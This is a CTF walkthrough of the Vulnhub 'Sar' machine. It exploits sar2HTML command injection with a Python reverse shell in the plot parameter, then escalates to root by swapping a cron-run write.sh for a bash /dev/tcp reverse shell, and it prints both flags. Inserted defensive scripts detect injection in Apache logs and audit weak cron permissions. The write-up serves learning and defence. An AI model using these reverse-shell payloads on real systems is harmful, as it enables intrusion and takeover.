Sar — Walkthrough

Mr. Robot, published in InfoSec Adventures
Mar 5, 2020

Sar is an OSCP-like VM with the intent of gaining experience
in the world of penetration testing.

Link: https://www.vulnhub.com/entry/sar-1,425/

Recently, a bunch of new boxes were released on Vulnhub. I decided to take a look at them because I wanted to see if I could find any OSCP-related machines. “Sar” was the only one that caught my eye. It’s definitely one of the easier ones and doesn’t take much time to complete. With that said, let’s get started!

Port Scanning

First, I started with a very simple port scan which included all ports, version / OS enumeration and default scripts. However, only one open port turned up.

t0thkr1s : ~
≫ nmap -A -Pn -p- 192.168.1.69
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-05 10:17 CET
Nmap scan report for 192.168.1.69
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Default Apache2 page, nothing interesting there. I quickly checked the most basic thing, which is robots.txt. It contained a single entry named sar2HTML.

I found the following web application under the previously discovered directory. At this point, I had a pretty good feeling about this.

The important part here is that we have the app name and version number in the top left corner. I searched for publicly available exploits and found out that the app is vulnerable to Remote Command Execution.

Gaining Access

The exploit description can be found here: https://www.exploit-db.com/exploits/47204

As you can see on the GIF above, we get the output of the command under the Select Host spinner, or whatever it’s called.

It was time to get a reverse shell out of this. I checked whether Python was installed, and it turned out we can use Python3 to get a connection back. Here’s what I used:

192.168.1.69/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.65",1010));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

After that I immediately got a hit on my reverse shell listener.

t0thkr1s : ~
≫ ncat -lvp 1010
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1010
Ncat: Listening on 0.0.0.0:1010
Ncat: Connection from 192.168.1.69.
Ncat: Connection from 192.168.1.69:55624.
bash: cannot set terminal process group (677): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sar:/var/www/html/sar2HTML$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sar:/var/www/html/sar2HTML$ cd /home
www-data@sar:/home$ ls
love
www-data@sar:/home$ cd love
www-data@sar:/home/love$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
www-data@sar:/home/love$ cd Desktop
www-data@sar:/home/love/Desktop$ ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
427a7e47deb4a8649c7cab38df232b52
www-data@sar:/home/love/Desktop$

User Flag: 427a7e47deb4a8649c7cab38df232b52
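From the defender’s side, the injected commands used in this section leave a clear trace in the Apache access log: the shell syntax arrives inside the plot query parameter. The script below is an added example, not part of the original walkthrough or of sar2HTML. It parses combined-format log lines, percent-decodes every query parameter (twice, to catch double encoding) and flags values that carry shell metacharacters or shell paths. The log lines in SAMPLE_LOG are constructed for the example and only mirror the request shape used above; the regexes and function names are mine.

```python
"""Added example: flag command-injection attempts in Apache access logs.

Not part of the original walkthrough or of sar2HTML. The log lines in
SAMPLE_LOG are constructed; the query shape mirrors the request used above.
"""
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Apache "combined" format, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A hostname or plot name never legitimately contains these.
SHELL_META = re.compile(r'[;|&`$]|/dev/tcp|/bin/(?:ba)?sh')


def parse_line(line):
    """Return the matched fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_query(query):
    """Split a raw query string on '&' only and percent-decode each part.

    Done by hand rather than with parse_qsl so a ';' inside a value is kept
    as data (older parse_qsl versions treat ';' as a separator).
    """
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_params(target):
    """Return (name, decoded_value) for parameters carrying shell syntax."""
    hits = []
    for name, value in split_query(urlsplit(target).query):
        decoded = unquote(value)  # second pass catches double-encoding
        if SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Run the check over an iterable of log lines; return one alert per hit."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["target"])
        if hits:
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "status": rec["status"],
                "params": hits,
            })
    return alerts


# Constructed sample: one benign request, two injection attempts (the second
# percent-encoded), and an unrelated request with no query string.
SAMPLE_LOG = [
    '192.168.1.65 - - [05/Mar/2020:10:30:01 +0100] "GET /sar2HTML/index.php?plot=localhost HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.1.65 - - [05/Mar/2020:10:31:14 +0100] "GET /sar2HTML/index.php?plot=;id HTTP/1.1" 200 5201 "-" "Mozilla/5.0"',
    '192.168.1.65 - - [05/Mar/2020:10:32:40 +0100] "GET /sar2HTML/index.php?plot=%3Bpython3%20-c%20%27import%20socket%27 HTTP/1.1" 200 5201 "-" "curl/7.68.0"',
    '192.168.1.70 - - [05/Mar/2020:10:33:02 +0100] "GET /robots.txt HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} {alert['path']} -> {alert['params']}")
```

Pointing `scan()` at the real access log (for example `scan(open("/var/log/apache2/access.log"))`) is enough for a first pass; a status code of 200 on a flagged request, as in the walkthrough, means the injected command most likely ran, so those lines deserve priority.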

Privilege Escalation

I prepared my favorite script for finding privilege escalation vectors and transferred it to the target machine using a simple HTTP server. I highly recommend it; you can find it here: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

The best thing about this shell script is that it highlights the possible privesc vectors, so you don’t have to read through hundreds of lines of output.

www-data@sar:/var/www/html$ cd /tmp
www-data@sar:/tmp$ wget 192.168.1.65/linpeas.sh
--2020-03-05 15:07:21-- http://192.168.1.65/linpeas.sh
Connecting to 192.168.1.65:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 159180 (155K) [application/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 155.45K --.-KB/s in 0.001s
2020-03-05 15:07:21 (151 MB/s) - 'linpeas.sh' saved [159180/159180]
www-data@sar:/tmp$ chmod +x linpeas.sh
www-data@sar:/tmp$ ./linpeas.sh
... snip ...
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 787 Oct 21 01:04 /etc/crontab
... snip ...
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
1 5 cron.daily run-parts --report /etc/cron.daily
7 10 cron.weekly run-parts --report /etc/cron.weekly
@monthly 15 cron.monthly run-parts --report /etc/cron.monthly

There was a cron job running as root that executes the finally.sh shell script in the /var/www/html directory every five minutes. If you’re unfamiliar with crontab schedule expressions, you can use https://crontab.guru.

Unfortunately, we can’t edit that shell script directly, but we can read it. Nothing special: it executes another shell script called write.sh.

www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Mar 5 15:32 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 55 Mar 5 15:32 write.sh
www-data@sar:/var/www/html$ cat finally.sh
#!/bin/sh
./write.sh
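The chain shown above (a root cron job, a web root owned by www-data, finally.sh calling a world-writable write.sh) is exactly what a periodic audit can catch before anyone lands a shell. The script below is an added example, not from the walkthrough and not part of linpeas: it parses /etc/crontab-style text, follows the `cd … && sudo ./script` pattern to the script that actually runs, recursively follows the scripts that one invokes, and reports every file a non-root user could edit or replace. `stage_demo_tree()` builds a temporary directory shaped like the box so the script runs offline; the file contents placed there are constructed, and the `root` parameter (my own naming) remaps paths under that staging tree. Run it with `root="/"` to audit a live host.

```python
"""Added example (not from the walkthrough or linpeas): audit root cron jobs for
scripts a non-root user could edit or replace. stage_demo_tree() builds a temp
directory shaped like the box; its file contents are constructed."""
import os
import re
import shlex
import stat
import tempfile

SCRIPT_REF = re.compile(r'(?:^|\s)(\.{0,2}/\S+)')  # ./x.sh, ../x.sh, /abs/x.sh

def parse_system_crontab(text):
    """Yield (user, command) for each job line of /etc/crontab-style text."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                 # blank, comment, VAR=value
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) == (3 if line.startswith("@") else 7):
            yield parts[-2], parts[-1]               # user, command

def command_target(command):
    """Return (cwd, program) for 'cd /dir && sudo ./x.sh'-style commands."""
    cwd, program = "/", None
    for segment in re.split(r'&&|\|\||;', command):
        try:
            toks = shlex.split(segment)
        except ValueError:                           # unbalanced quotes: skip segment
            continue
        if toks and toks[0] == "cd" and len(toks) > 1:
            cwd = os.path.normpath(os.path.join(cwd, toks[1]))
            continue
        while toks and (toks[0] == "sudo" or "=" in toks[0]):
            toks.pop(0)                              # skip sudo / VAR=value prefixes
        if toks:
            program = toks[0]
    return cwd, program

def weak_permissions(path):
    """Reasons a non-root user could edit PATH or swap the file out."""
    st, parent = os.stat(path), os.stat(os.path.dirname(path))
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("group-writable by a non-root group")
    if st.st_uid != 0:
        reasons.append("owned by a non-root user")
    # a writable parent dir (without the sticky bit) lets the file be replaced
    if parent.st_uid != 0 or (parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX):
        reasons.append("parent directory lets a non-root user replace the file")
    return reasons

def audit_script(path, cwd, root, seen):
    """Check one script, then every script it invokes, inside ROOT's tree."""
    logical = os.path.normpath(os.path.join(cwd, path))
    staged = os.path.join(root, logical.lstrip("/"))
    if staged in seen or not os.path.isfile(staged):
        return []
    seen.add(staged)
    findings = [(logical, reason) for reason in weak_permissions(staged)]
    with open(staged, errors="replace") as fh:
        for line in fh:
            if not line.lstrip().startswith("#"):
                # relative paths resolve against cron's cwd, not the script's directory
                for ref in SCRIPT_REF.findall(line):
                    findings.extend(audit_script(ref, cwd, root, seen))
    return findings

def audit_crontab(text, root="/"):
    """Return (path, reason) pairs for every root job that reaches a weak file."""
    findings = []
    for user, command in parse_system_crontab(text):
        cwd, program = command_target(command)
        if user == "root" and program:
            findings.extend(audit_script(program, cwd, root, set()))
    return findings

DEMO_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
"""

def stage_demo_tree():
    """Temp tree shaped like the box: 0755 finally.sh invoking 0777 write.sh."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    html = os.path.join(root, "var/www/html")
    os.makedirs(html)
    for name, body, mode in (("finally.sh", "#!/bin/sh\n./write.sh\n", 0o755),
                             ("write.sh", "#!/bin/bash\necho placeholder\n", 0o777)):
        with open(os.path.join(html, name), "w") as fh:
            fh.write(body)                           # constructed content
        os.chmod(os.path.join(html, name), mode)
    return root

if __name__ == "__main__":
    for logical, reason in audit_crontab(DEMO_CRONTAB, stage_demo_tree()):
        print(f"{logical}: {reason}")
```

The fix on a real host follows from the findings: scripts run by root cron jobs should be root-owned, mode 0755 or tighter, and live in a root-owned directory, so that neither the script nor any file it calls can be rewritten or swapped out by the web server account. Note that the parent-directory check is what flags a root-owned finally.sh sitting in a www-data-owned web root, as in the listing above.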

I figured, why not delete this write.sh script (since we have full permissions on it) and replace it with a cute reverse shell? So I created the following script:

t0thkr1s : ~/Downloads
≫ cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.65/9999 0>&1

After transferring it to the target, I set every permission with chmod 777 write.sh and set up my ncat listener on port 9999.

www-data@sar:/tmp$ cd /var/www/html
www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Oct 21 05:20 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Oct 21 02:00 write.sh
www-data@sar:/var/www/html$ rm write.sh
www-data@sar:/var/www/html$ wget 192.168.1.65/write.sh
--2020-03-05 15:32:59-- http://192.168.1.65/write.sh
Connecting to 192.168.1.65:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55 [application/x-sh]
Saving to: 'write.sh'
write.sh 100%[===================>] 55 --.-KB/s in 0s
2020-03-05 15:32:59 (9.99 MB/s) - 'write.sh' saved [55/55]
www-data@sar:/var/www/html$ chmod 777 write.sh
www-data@sar:/var/www/html$ ls -la
total 40
drwxr-xr-x 3 www-data www-data 4096 Mar 5 15:32 .
drwxr-xr-x 5 www-data www-data 4096 Mar 5 15:07 ..
-rwxr-xr-x 1 root root 22 Oct 20 21:18 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 20:34 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 21:03 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 03:10 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Oct 20 21:06 sar2HTML
-rwxrwxrwx 1 www-data www-data 55 Mar 5 15:32 write.sh
www-data@sar:/var/www/html$

I waited a couple of minutes and got my reverse shell with root privileges.

t0thkr1s : ~
≫ ncat -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.69.
Ncat: Connection from 192.168.1.69:37982.
bash: cannot set terminal process group (20143): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@sar:/var/www/html# cd /root
root@sar:~# ls
root.txt
root@sar:~# cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99

Root Flag: 66f93d6b2ca96c9ad78a8a9ba0008e99

Before You Go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! Feedback is always welcome! 🙏

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.